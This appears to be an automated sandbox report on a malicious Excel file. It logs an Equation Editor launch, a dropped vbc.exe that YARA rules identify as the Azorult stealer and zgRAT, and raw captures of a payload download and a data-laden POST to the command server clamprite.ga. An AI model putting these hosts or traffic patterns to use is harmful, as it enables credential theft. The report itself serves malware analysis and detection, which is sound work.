33 cf 75 66 65 66 d8 30 9e ed 8e cb 33 40 72 66 65 78 da 30 9e f8 8c cb 33 49 74 66 65 eb d9 30 9e 71 8f cb 33 ec 74 66 65 4a d9 30 9e 0a 8e cb 33 61 75 66 65 cd d8 30 9e 87 8e cb 33 ee 75 66 65 4e d8 30 9e 04 89 cb 33 54 66 67 65 ad cb 33 9e 06 9d ce 33 52 66 61 65 a7 cb 39 9e 08 9d c0 33 58 66
                                                                                                  Data Ascii: 4442fe?6Oqp'z&H"Hh-PVePIh9QuU/0`rQa@"O8ud&j`Yp6aKN/tBt>@Hh-GN6FezaNb3,6?;@/#HB/]'30_3PffeP403Tffe03Tffe03Tffe03Tffe0q=Tos1[=FWcP5R"]tEcoVzkko03m0UjCU2UQjCW0UR3gde.q23TffeO29T`fe03Tffe03Tffu03^ffe03Tffe03X,fep3Tvfe 3Tffe03efe03TFfe_03Tffe0:3Tffe03ffe03Tffe03Tffe03Tffe03Tffe03Tffe03TffeUv3bfe03Tdfe03Tffe0,A7ffe_03Tbfe03Tffe0BsTffe.q23Vffe0V3dfe0'Tffe0f3vfe?03D03Tffe035"6]=>^hTk35HkP;H^m8WKTf3Tffe0V3z0V3ffeTvI.03efeTv3TFfe0,A7BVT0b3efeCaTffe03Tffe0'Tffe03Zffe0*34wfe703Stfe0U3tfee03Nufe0m3ufef03@rfex03Itfe0q3tfeJ03aufe03ufeN03Tfge33Rfae93Xf
                                                                                                  Feb 26, 2022 09:31:17.243438959 CET895INData Raw: 6b 65 ce bb 59 b3 6f ee e6 44 3d 08 4b 06 c0 b9 55 b3 61 f2 a5 40 3b 0a 03 48 c3 fa 1d af 2f ad e5 57 38 0a 66 24 c3 a7 5f fd 41 f2 a5 40 3b 0a 03 65 c4 ae 42 f0 67 f1 f8 01 7a 27 0a 09 c0 a8 73 f1 6c ee a4 5f 31 66 21 00 db 88 5f f0 71 f2 a7 56
                                                                                                  Data Ascii: keYoD=KUa@;H/W8f$_A@;eBgz'sl_1f!_qV6f^n&CncT!^m~;eBgz!^m~;eDm\8)EAX1Ep;vG6f"~oA%_gC!#DA:Vwv^6*
                                                                                                  Feb 26, 2022 09:31:17.243465900 CET897INData Raw: 3b 9d fb 33 60 66 24 65 9f cb 30 9e 4e 9d dd 33 55 66 25 65 c0 cb 5d 9e 72 9d aa 33 3a 66 1f 65 e1 cb 51 9e 6f 9d ae 33 54 66 66 65 e2 cb 59 9e 61 9d b9 33 3b 66 15 65 c0 cb 56 9e 76 9d eb 33 17 66 09 65 dd cb 40 9e 6d 9d b9 33 35 66 12 65 c6 cb
                                                                                                  Data Ascii: ;3`f$e0N3Uf%e]r3:feQo3TffeYa3;feVv3fe@m35fe_l3fvevk31f"eCa3=feYm3Tffe@k31fecv36fFe|N3>fCevk31f0eBq3;fe033zfVe43mf_e73|f1e^@3=fe3
                                                                                                  Feb 26, 2022 09:31:17.243493080 CET898INData Raw: 4f 19 66 89 9c a6 25 26 49 b5 d5 2f d0 7c eb a9 da 36 1b b6 4b 9b 3e 97 b7 99 97 06 06 b5 e4 4a 59 0a 55 63 ab 8d 69 89 c2 82 fe 98 fc a3 00 c3 62 7d 59 7a 36 55 01 4c 8b e4 0d d5 85 f4 f5 0d 64 7a 36 fe 60 d9 32 72 e6 1b 5d a8 33 09 d2 75 c5 2c
                                                                                                  Data Ascii: Of%&I/|6K>JYUcib}Yz6ULdz6`2r]3u,xxU6t^W{+Rz7{*-/*1s2#rqR-ndv.Y5!>|R*b`kyHSr:eKL]V1=mbo#X:I?
                                                                                                  Feb 26, 2022 09:31:17.243516922 CET899INData Raw: 0a 5f 48 0e ea 50 4f 1a 39 21 68 23 4f 8d df bb bb f7 8b 86 1d d1 a0 be d2 7a 48 c8 9a 91 4d 53 07 c6 2e 59 f8 24 4d 61 9e 27 52 f6 58 1c 76 3e cd a7 d2 dd d1 89 0b b4 d6 f1 1a b4 73 16 fc fa 76 6e 08 8b 9a 61 7e 9e 86 b6 6f 12 8d cd b8 e7 f9 22
                                                                                                  Data Ascii: _HPO9!h#OzHMS.Y$Ma'RXv>svna~o"t&idedU:Vve'^`nN5I`e04E9i&Af.Eb,UovF^`e0#C`VTc4m^VVQd2K05PS7mU/
                                                                                                  Feb 26, 2022 09:31:17.243544102 CET901INData Raw: 7b 63 ac 9e 2d 90 06 8b cf 27 9f 77 8e af 7d 7f 26 c6 03 54 fc 1d 67 70 70 dc e3 51 3a 81 32 96 cd 30 01 7b 69 61 ab c8 32 9f 84 ad d9 35 5d 4d 60 64 ab ca b2 a9 17 9c cf 36 56 65 67 65 ae fb 13 98 0b b6 cd 32 50 67 e4 52 ba c9 34 88 06 89 36 e2
                                                                                                  Data Ascii: {c-'w}&TgppQ:20{ia25]M`d6Vege2PgR46e(C%^bc;Zw5Ubg23fesC5W3{F&3\a^5<Ko.Kb/Uu>A=ka9_v\9ISnA;k\'_aGz
                                                                                                  Feb 26, 2022 09:31:17.243570089 CET902INData Raw: 95 e3 33 e1 47 95 6e d2 fc a6 62 2a 47 0d 54 7b 54 2c 21 03 be ec 19 f8 aa 0a 2f e0 52 e7 2c c7 56 4f 97 8f 45 89 c2 b1 cb e2 8b 30 d7 35 31 04 1f cd c3 b6 54 76 56 23 42 7c ee bd 44 26 0f 1e 00 f9 c9 7b d7 8a 01 e9 ce 06 14 08 d7 f5 c7 04 ad 7e
                                                                                                  Data Ascii: 3Gnb*GT{T,!/R,VOE051TvV#B|D&{~-a<gGg^_ded6UVjePcVffIhbsDu$l%T-)-iVne0VgU92Qsd2JRe3x2F@hfx Lo^iz<5V9T!Y
                                                                                                  Feb 26, 2022 09:31:17.243596077 CET904INData Raw: 6c 4e a9 ca 34 9f 80 aa c1 30 48 57 48 69 83 b8 60 c7 35 e5 9b 71 63 0e 32 50 c8 fe 78 d6 70 c4 bf 0b 26 22 2a 36 e2 f2 66 eb 58 cf be 64 0e 07 03 03 9d ae 02 ac 50 ee fe 07 69 56 3c 63 a5 e0 36 9f 06 9c 49 04 56 67 6a 54 e3 fb 7a 3e 26 1d e9 33
                                                                                                  Data Ascii: lN40HWHi`5qc2Pxp&"*6fXdPiV<c6IVgjTz>&3feBm3;feU3:feGq<tu9_v\9I_q5]L-)<=3Pge'NO\g<)n;{|l"[Yf@lZA!0zK/YQM?Q
                                                                                                  Feb 26, 2022 09:31:17.243621111 CET905INData Raw: 0f ac f3 03 66 57 51 57 9e fe 09 af 31 c7 fb b2 d6 57 6d 55 a6 cd 33 cb 06 9b d8 31 01 35 57 76 9f da 36 9d 57 99 c3 20 5e 31 07 16 c7 a2 5e f9 76 f2 a5 02 44 56 68 63 ac 9e 34 99 11 9a 99 56 30 0b 09 0b cb fa 2e ae 1e 9b c8 66 50 6c 75 70 e2 a2
                                                                                                  Data Ascii: fWQW1WmU315Wv6W ^1^vDVhc4V0.fPlupSmU F%_c\:WjU30)%T,0Gs+_mQkgDU9MYggd3glg-1nruj7vEJ!F<<lUZr3-gJ8W
                                                                                                  Feb 26, 2022 09:31:17.243647099 CET907INData Raw: 15 0d c6 a5 57 ea 6d f3 fa 23 64 68 60 66 fa cf 37 8d 05 cf ae 57 39 09 08 01 9e d5 00 82 04 9e 9e 37 5e 75 73 28 c6 a8 42 f1 71 f2 ad 47 74 25 09 17 df a4 42 ff 76 f4 a4 5d 65 4e 56 43 a9 c8 65 9a 01 8e d4 7e 3d 05 14 0a dc a4 56 ea 22 de a4 57
                                                                                                  Data Ascii: Wm#dh`f7W97^us(BqGt%Bv]eNVCe~=V"W1F5YepFTU>RoLM6TedUgf`e(of)1_iT!w=b~_gg/$!3SfmL6C-,%Lxb~O2_R
                                                                                                  Feb 26, 2022 09:31:17.344115019 CET908INData Raw: 64 ae d8 14 6d 71 1e e2 99 05 7e 5d 5d 2f 3e 0e 13 35 d0 85 4a 10 3b ff 3f b7 1c a1 78 a8 51 3f 91 8b 72 af a6 82 db 3b 96 30 fa da 8b 96 61 9c 9f f7 b2 e1 43 b5 bc a4 3b 45 37 e5 27 ec 8f 98 52 0c 80 b1 69 14 13 04 94 e8 0e 02 d6 70 40 55 2d dd
                                                                                                  Data Ascii: dmq~]]/>5J;?xQ?r;0aC;E7'Rip@U-VT95Gd367\ul2Xl\:WvU34T5W3bo}a@;EBmG=T0Gy+_mYlTt6%$2Tfg+:CjTffe


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.2.224916980.66.64.17480C:\Users\Public\vbc.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Feb 26, 2022 09:31:48.736900091 CET5601OUTPOST /azo01/index.php HTTP/1.1
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                                                  Host: clamprite.ga
                                                                                                  Content-Length: 100266
                                                                                                  Cache-Control: no-cache
                                                                                                  Feb 26, 2022 09:31:48.736931086 CET5602OUTData Raw: 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3a 70 9d 3a 70 9d 37 70 9d 37 13 8b 30 65 8b 30 60 8b 30
                                                                                                  Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp:p:p7p70e0`0m10m&fEp60gp5pFp2)j;l"&g&f&gS'e0p<m4-0c0a&f&f&f&f&f&fa p3)0e&fp2p1)6f4bEx1m.a7dBc2x2g5g3b63c.a7e
                                                                                                  Feb 26, 2022 09:31:48.841109991 CET5607OUTData Raw: 67 30 dd 68 78 c0 66 21 d9 6c 27 c5 22 78 8d 43 64 9b 33 6d 96 37 66 9f 33 61 9f 33 64 82 6f 3c d8 66 3c c0 77 30 c0 77 78 c0 66 21 d9 6c 27 c5 22 78 8d 43 64 9b 33 6d 96 37 66 9f 33 61 9f 33 64 82 64 3a c1 64 39 cb 2e 3b cb 77 22 c1 71 3e 8f 2e
                                                                                                  Data Ascii: g0hxf!l'"xCd3m7f3a3do<f<w0wxf!l'"xCd3m7f3a3dd:d9.;w"q>.v2`;m0d7d2yj#q4st 6e;a2e2e/4s;{ "xCd3m7f3a3dw4b1.v2`;m0d7d2yl8l'"xCd3m7f3a3da9f>jt 6e;a2e2e/>nt 6e;a2e2e
                                                                                                  Feb 26, 2022 09:31:48.946827888 CET5614OUTData Raw: 66 16 c6 71 3a c3 66 0a ea 66 33 cf 76 39 da 2d 21 d6 77 7b c9 6c 3a c9 6f 30 80 60 3a c3 0a 01 fc 56 10 a7 2c 5c fa 51 00 eb 0a 64 9b 3a 6d 9f 31 64 9f 34 62 a7 32 05 f1 49 14 fc 0a 6a a3 09 7b c9 6c 3a c9 6f 30 80 60 3a c3 0a 01 fc 56 10 a7 2c
                                                                                                  Data Ascii: fq:ff3v9-!w{l:o0`:V,\Qd:m1d4b2Ij{l:o0`:V,6n%f!,&b'k\BF\5d3m2bJ<X-2l2f{l8WF\p0q6Od2d;d4b@@\_d:d9-6n\QzEP1d6l2l4\LFj"t{l:o0`:Oz
                                                                                                  Feb 26, 2022 09:31:49.050777912 CET5617OUTData Raw: 1b d5 02 a2 c0 ee 3a 38 32 8f b2 56 a9 58 05 eb 6a 84 01 d4 76 52 49 9b a6 98 de 76 bb 03 62 9e 4b 3e e0 63 b7 e6 02 1d 3c e9 44 20 cc ba 09 22 1e f5 3f c0 2f d8 aa 0a fc 89 73 31 c9 99 24 19 8b 9b 18 1d 5d 60 11 ca 7c f3 ef ec be fe 93 5a ff 45
                                                                                                  Data Ascii: :82VXjvRIvbK>c<D "?/s1$]`|ZEF*kY&l7~^te!C(;YDp=5I<@WdBM8+-'f7b#Ryj8M{1;/-X<ip&+nv=8
                                                                                                  Feb 26, 2022 09:31:49.050810099 CET5620OUTData Raw: 93 0f 3f e9 0f 2b 97 02 1f 26 e6 65 2f 03 27 e7 f7 00 16 0d d1 12 71 49 3a b2 1b 55 04 cd 77 14 18 89 8b 82 fe bd 49 96 c1 01 d2 e6 2c 3c 0a cd 5b 8c 0a ce 36 dd ae 10 8b a0 7b c4 0a 3a a3 f7 84 74 49 30 2f 58 5d 49 bb fd 4f 3a 73 05 ed fc 03 ba
                                                                                                  Data Ascii: ?+&e/'qI:UwI,<[6{:tI0/X]IO:sc*"YcUX0|kI$N^P~!l0uHmGo\9-gKIN!?M;D?jUNx6&GO;=(F\U,<F|<vUA`Egho.
                                                                                                  Feb 26, 2022 09:31:49.050843000 CET5630OUTData Raw: d9 8c 9f b2 72 40 9d 6a a1 c5 e7 2b af 15 cd 6e 4a ca 84 6c 75 40 97 61 bb 79 e2 78 42 00 a3 e8 17 8e b1 1a 64 c8 7d 51 cc 22 f3 fb bb 4d 45 28 24 c5 0d df cb 73 6b ed 10 8a b4 3a 64 63 39 54 a6 85 33 9a b1 29 34 69 d3 a6 5a cb ba fa bd 9e b8 70
                                                                                                  Data Ascii: r@j+nJlu@ayxBd}Q"ME($sk:dc9T3)4iZp:XAQ1J:E\&>lIb{#x%StjgIRQn\J7H9zPSf*08!}(@ZhW[u,,
                                                                                                  Feb 26, 2022 09:31:49.154896021 CET5636OUTData Raw: ed b6 11 1c 88 02 dc b8 05 ec ac 49 6a 9b 91 e6 c4 43 fb 87 18 b4 29 6a 15 1e ec 44 19 6a 7b a8 c5 0c fe 7a ef 20 d3 6d c2 dc fc 55 27 bc b6 6c 1c af 40 bc af a5 55 53 84 d6 b3 0f 74 28 b4 c4 6a 3c 12 09 91 cb d1 b2 e3 da f1 79 f8 24 e8 f4 a9 0b
                                                                                                  Data Ascii: IjC)jDj{z mU'l@USt(j<y$0}si_A+*$HSdABRm|HCXkr8&}(K5*=@$.AnIdFU&xX$_!A 1xW8?YPl \Nc
                                                                                                  Feb 26, 2022 09:31:49.154943943 CET5649OUTData Raw: a0 7f 05 d3 9f 9f 97 37 02 33 10 93 46 0a 13 b4 89 10 61 db e9 59 f3 0c bf 1c e9 96 8d 54 1b 81 48 54 49 0c a6 14 e3 52 07 86 aa 77 e2 7b 0f 3f 46 77 a4 97 5f c6 c6 e4 64 29 00 ba c6 40 84 89 f1 22 67 90 75 4a e3 0a 01 c2 c3 59 13 d9 1b 50 96 09
                                                                                                  Data Ascii: 73FaYTHTIRw{?Fw_d)@"guJYPvNuNM49p1oH>+;E6cfsQYf-]0_0h]d9zs_xiU==faY|*6`+*~!mYai
                                                                                                  Feb 26, 2022 09:31:49.154966116 CET5657OUTData Raw: 73 82 bf 3c c1 1f e4 c7 2b c0 b2 47 c0 5a 68 bb ff 67 c6 3d cb 85 f3 09 28 62 cc c9 bc 78 30 77 3f 1b 7f 6a ee 69 dd 8d ea 60 a5 08 9c da 13 bb 09 b2 7c b0 c6 53 19 af e6 6e 31 24 52 50 10 c8 32 3f 85 93 dc d8 db e5 72 c9 9d 0d 2d 66 a6 ec 7a 66
                                                                                                  Data Ascii: s<+GZhg=(bx0w?ji`|Sn1$RP2?r-fzf>A&b*:IuVq6PQTF2|v,7F,oM6HZI&eIr28(3gL}(Oa[5X^\h?|w v/GLr*~~So
                                                                                                  Feb 26, 2022 09:31:49.154978037 CET5662OUTData Raw: 80 af fb b8 4e f7 6e 82 59 b1 52 95 41 d9 a2 73 6f fb b9 7d 1c 14 66 d4 06 41 fc 10 19 ec 10 1c eb 26 67 ac 89 7c d8 e0 c3 96 a5 56 c7 75 b6 41 1c 97 3a b5 6b 46 c6 65 7e 2e 50 83 8c ef 9f 4e 61 fc 50 70 1e a7 f7 24 61 47 3c 95 c7 36 87 f7 24 49
                                                                                                  Data Ascii: NnYRAso}fA&g|VuA:kFe~.PNaPp$aG<6$I7IaG$*|&*|*IaG$+Q|a*VA=g[:=?<H8&A}5$+UbU[@fDlS/b!b:7C%]:Q)j'%"%
                                                                                                  Feb 26, 2022 09:31:49.707791090 CET5701INHTTP/1.1 200 OK
                                                                                                  Date: Sat, 26 Feb 2022 08:31:49 GMT
                                                                                                  Server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                                  X-Powered-By: PHP/5.6.40
                                                                                                  Content-Length: 7
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Data Raw: 66 61 6c 73 65 4f 4b
                                                                                                  Data Ascii: falseOK


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:09:29:17
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                  Imagebase:0x13f070000
                                                                                                  File size:28253536 bytes
                                                                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:2
                                                                                                  Start time:09:29:40
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                  Imagebase:0x400000
                                                                                                  File size:543304 bytes
                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:09:29:43
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                                                                  Imagebase:0xf20000
                                                                                                  File size:196608 bytes
                                                                                                  MD5 hash:8620EEAF925B0C5943C5B0A217797A32
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000004.00000002.608258288.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_gzRat, Description: Yara detected gzRat, Source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000004.00000002.608692575.00000000055B0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: JoeSecurity_gzRat, Description: Yara detected gzRat, Source: 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000004.00000002.606811341.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.606811341.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000004.00000002.606811341.0000000002741000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.606099043.00000000023AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Target ID:5
                                                                                                  Start time:09:29:45
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                                                                  Imagebase:0x4a820000
                                                                                                  File size:302592 bytes
                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:09:29:45
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:timeout 20
                                                                                                  Imagebase:0x290000
                                                                                                  File size:27136 bytes
                                                                                                  MD5 hash:419A5EF8D76693048E4D6F79A5C875AE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:09:30:48
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Users\Public\vbc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\Public\vbc.exe
                                                                                                  Imagebase:0xf20000
                                                                                                  File size:196608 bytes
                                                                                                  MD5 hash:8620EEAF925B0C5943C5B0A217797A32
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000009.00000000.602581852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000009.00000000.601844130.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000002.677445164.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000009.00000000.602321607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000009.00000000.603363406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000002.677477720.0000000004BE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult, Description: Yara detected Azorult Info Stealer, Source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Azorult_1, Description: Azorult Payload, Source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                                                                  • Rule: Azorult, Description: detect Azorult in memory, Source: 00000009.00000000.602874997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000009.00000002.676901801.0000000004850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:09:31:02
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe"
                                                                                                  Imagebase:0xc40000
                                                                                                  File size:196608 bytes
                                                                                                  MD5 hash:8620EEAF925B0C5943C5B0A217797A32
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:09:31:04
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout 20
                                                                                                  Imagebase:0x4ac60000
                                                                                                  File size:302592 bytes
                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:09:31:05
                                                                                                  Start date:26/02/2022
                                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:timeout 20
                                                                                                  Imagebase:0xdf0000
